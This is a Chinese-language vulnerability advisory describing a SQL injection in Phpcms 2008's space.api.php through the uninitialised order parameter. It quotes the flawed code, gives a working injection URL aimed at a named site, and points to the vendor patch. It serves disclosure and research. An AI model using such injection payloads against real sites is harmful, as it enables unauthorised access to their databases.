Phpcms 2008 space.api.php SQL注入漏洞

影响版本:
Phpcms 2008
漏洞描述:
Phpcms 是国内领先的网站内容管理系统,同时也是一个开源的PHP开发框架。

在文件api/space.api.php中:
$arr_content = $content->listinfo("userid='$userid'", $order, 1, 10);  //第7行
Listinfo函数在文件include/admin/ content.class.php中:
function listinfo($where = '', $order = '`listorder` DESC,`contentid` DESC', $page = 1, $pagesize = 50)    //第169行
	{
		if($where) $where = " WHERE $where $this->userid_sql";
		if($order) $order = " ORDER BY $order";
……
$result = $this->db->query("SELECT * FROM `$this->table` $where $order $limit");  //第179行
变量$order没有初始化放入sql语句,导致注入漏洞的产生。
测试方法:
本站提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!

http://ennuu.com/api/space.api.php?userid=2&order=if((select%20count(*)%20from%20phpcms_member)>1,contentid,1)%20desc%23
安全建议:
厂商补丁:
PHPCMS
----------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
http://www.phpcms.cn
发表评论?

0 条评论。

发表评论